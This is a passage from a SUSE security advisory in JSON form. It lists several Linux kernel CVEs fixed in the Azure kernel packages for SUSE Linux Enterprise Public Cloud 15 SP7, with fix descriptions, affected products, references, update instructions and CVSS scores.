"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40261",
"url": "https://www.suse.com/security/cve/CVE-2025-40261"
},
{
"category": "external",
"summary": "SUSE Bug 1254839 for CVE-2025-40261",
"url": "https://bugzilla.suse.com/1254839"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-40261"
},
{
"cve": "CVE-2025-40264",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40264"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbe2net: pass wrb_params in case of OS2BMC\n\nbe_insert_vlan_in_pkt() is called with the wrb_params argument being NULL\nat be_send_pkt_to_bmc() call site. This may lead to dereferencing a NULL\npointer when processing a workaround for specific packet, as commit\nbc0c3405abbb (\"be2net: fix a Tx stall bug caused by a specific ipv6\npacket\") states.\n\nThe correct way would be to pass the wrb_params from be_xmit().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40264",
"url": "https://www.suse.com/security/cve/CVE-2025-40264"
},
{
"category": "external",
"summary": "SUSE Bug 1254835 for CVE-2025-40264",
"url": "https://bugzilla.suse.com/1254835"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-40264"
},
{
"cve": "CVE-2025-40328",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40328"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix potential UAF in smb2_close_cached_fid()\n\nfind_or_create_cached_dir() could grab a new reference after kref_put()\nhad seen the refcount drop to zero but before cfid_list_lock is acquired\nin smb2_close_cached_fid(), leading to use-after-free.\n\nSwitch to kref_put_lock() so cfid_release() is called with\ncfid_list_lock held, closing that gap.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40328",
"url": "https://www.suse.com/security/cve/CVE-2025-40328"
},
{
"category": "external",
"summary": "SUSE Bug 1254624 for CVE-2025-40328",
"url": "https://bugzilla.suse.com/1254624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-40328"
},
{
"cve": "CVE-2025-40350",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40350"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: RX, Fix generating skb from non-linear xdp_buff for striding RQ\n\nXDP programs can change the layout of an xdp_buff through\nbpf_xdp_adjust_tail() and bpf_xdp_adjust_head(). Therefore, the driver\ncannot assume the size of the linear data area nor fragments. Fix the\nbug in mlx5 by generating skb according to xdp_buff after XDP programs\nrun.\n\nCurrently, when handling multi-buf XDP, the mlx5 driver assumes the\nlayout of an xdp_buff to be unchanged. That is, the linear data area\ncontinues to be empty and fragments remain the same. This may cause\nthe driver to generate erroneous skb or triggering a kernel\nwarning. When an XDP program added linear data through\nbpf_xdp_adjust_head(), the linear data will be ignored as\nmlx5e_build_linear_skb() builds an skb without linear data and then\npull data from fragments to fill the linear data area. When an XDP\nprogram has shrunk the non-linear data through bpf_xdp_adjust_tail(),\nthe delta passed to __pskb_pull_tail() may exceed the actual nonlinear\ndata size and trigger the BUG_ON in it.\n\nTo fix the issue, first record the original number of fragments. If the\nnumber of fragments changes after the XDP program runs, rewind the end\nfragment pointer by the difference and recalculate the truesize. Then,\nbuild the skb with the linear data area matching the xdp_buff. Finally,\nonly pull data in if there is non-linear data and fill the linear part\nup to 256 bytes.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40350",
"url": "https://www.suse.com/security/cve/CVE-2025-40350"
},
{
"category": "external",
"summary": "SUSE Bug 1255260 for CVE-2025-40350",
"url": "https://bugzilla.suse.com/1255260"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-40350"
},
{
"cve": "CVE-2025-40355",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40355"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsysfs: check visibility before changing group attribute ownership\n\nSince commit 0c17270f9b92 (\"net: sysfs: Implement is_visible for\nphys_(port_id, port_name, switch_id)\"), __dev_change_net_namespace() can\nhit WARN_ON() when trying to change owner of a file that isn\u0027t visible.\nSee the trace below:\n\n WARNING: CPU: 6 PID: 2938 at net/core/dev.c:12410 __dev_change_net_namespace+0xb89/0xc30\n CPU: 6 UID: 0 PID: 2938 Comm: incusd Not tainted 6.17.1-1-mainline #1 PREEMPT(full) 4b783b4a638669fb644857f484487d17cb45ed1f\n Hardware name: Framework Laptop 13 (AMD Ryzen 7040Series)/FRANMDCP07, BIOS 03.07 02/19/2025\n RIP: 0010:__dev_change_net_namespace+0xb89/0xc30\n [...]\n Call Trace:\n \u003cTASK\u003e\n ? if6_seq_show+0x30/0x50\n do_setlink.isra.0+0xc7/0x1270\n ? __nla_validate_parse+0x5c/0xcc0\n ? security_capable+0x94/0x1a0\n rtnl_newlink+0x858/0xc20\n ? update_curr+0x8e/0x1c0\n ? update_entity_lag+0x71/0x80\n ? sched_balance_newidle+0x358/0x450\n ? psi_task_switch+0x113/0x2a0\n ? __pfx_rtnl_newlink+0x10/0x10\n rtnetlink_rcv_msg+0x346/0x3e0\n ? sched_clock+0x10/0x30\n ? __pfx_rtnetlink_rcv_msg+0x10/0x10\n netlink_rcv_skb+0x59/0x110\n netlink_unicast+0x285/0x3c0\n ? __alloc_skb+0xdb/0x1a0\n netlink_sendmsg+0x20d/0x430\n ____sys_sendmsg+0x39f/0x3d0\n ? import_iovec+0x2f/0x40\n ___sys_sendmsg+0x99/0xe0\n __sys_sendmsg+0x8a/0xf0\n do_syscall_64+0x81/0x970\n ? __sys_bind+0xe3/0x110\n ? syscall_exit_work+0x143/0x1b0\n ? do_syscall_64+0x244/0x970\n ? sock_alloc_file+0x63/0xc0\n ? syscall_exit_work+0x143/0x1b0\n ? do_syscall_64+0x244/0x970\n ? alloc_fd+0x12e/0x190\n ? put_unused_fd+0x2a/0x70\n ? do_sys_openat2+0xa2/0xe0\n ? syscall_exit_work+0x143/0x1b0\n ? do_syscall_64+0x244/0x970\n ? exc_page_fault+0x7e/0x1a0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n [...]\n \u003c/TASK\u003e\n\nFix this by checking is_visible() before trying to touch the attribute.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40355",
"url": "https://www.suse.com/security/cve/CVE-2025-40355"
},
{
"category": "external",
"summary": "SUSE Bug 1255261 for CVE-2025-40355",
"url": "https://bugzilla.suse.com/1255261"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-40355"
},
{
"cve": "CVE-2025-40363",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40363"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ipv6: fix field-spanning memcpy warning in AH output\n\nFix field-spanning memcpy warnings in ah6_output() and\nah6_output_done() where extension headers are copied to/from IPv6\naddress fields, triggering fortify-string warnings about writes beyond\nthe 16-byte address fields.\n\n memcpy: detected field-spanning write (size 40) of single field \"\u0026top_iph-\u003esaddr\" at net/ipv6/ah6.c:439 (size 16)\n WARNING: CPU: 0 PID: 8838 at net/ipv6/ah6.c:439 ah6_output+0xe7e/0x14e0 net/ipv6/ah6.c:439\n\nThe warnings are false positives as the extension headers are\nintentionally placed after the IPv6 header in memory. Fix by properly\ncopying addresses and extension headers separately, and introduce\nhelper functions to avoid code duplication.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40363",
"url": "https://www.suse.com/security/cve/CVE-2025-40363"
},
{
"category": "external",
"summary": "SUSE Bug 1255102 for CVE-2025-40363",
"url": "https://bugzilla.suse.com/1255102"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "low"
}
],
"title": "CVE-2025-40363"
},
{
"cve": "CVE-2025-68171",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68171"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/fpu: Ensure XFD state on signal delivery\n\nSean reported [1] the following splat when running KVM tests:\n\n WARNING: CPU: 232 PID: 15391 at xfd_validate_state+0x65/0x70\n Call Trace:\n \u003cTASK\u003e\n fpu__clear_user_states+0x9c/0x100\n arch_do_signal_or_restart+0x142/0x210\n exit_to_user_mode_loop+0x55/0x100\n do_syscall_64+0x205/0x2c0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n\nChao further identified [2] a reproducible scenario involving signal\ndelivery: a non-AMX task is preempted by an AMX-enabled task which\nmodifies the XFD MSR.\n\nWhen the non-AMX task resumes and reloads XSTATE with init values,\na warning is triggered due to a mismatch between fpstate::xfd and the\nCPU\u0027s current XFD state. fpu__clear_user_states() does not currently\nre-synchronize the XFD state after such preemption.\n\nInvoke xfd_update_state() which detects and corrects the mismatch if\nthere is a dynamic feature.\n\nThis also benefits the sigreturn path, as fpu__restore_sig() may call\nfpu__clear_user_states() when the sigframe is inaccessible.\n\n[ dhansen: minor changelog munging ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68171",
"url": "https://www.suse.com/security/cve/CVE-2025-68171"
},
{
"category": "external",
"summary": "SUSE Bug 1255255 for CVE-2025-68171",
"url": "https://bugzilla.suse.com/1255255"
}
],
"remediations": [
{
"category": "vendor_fix",
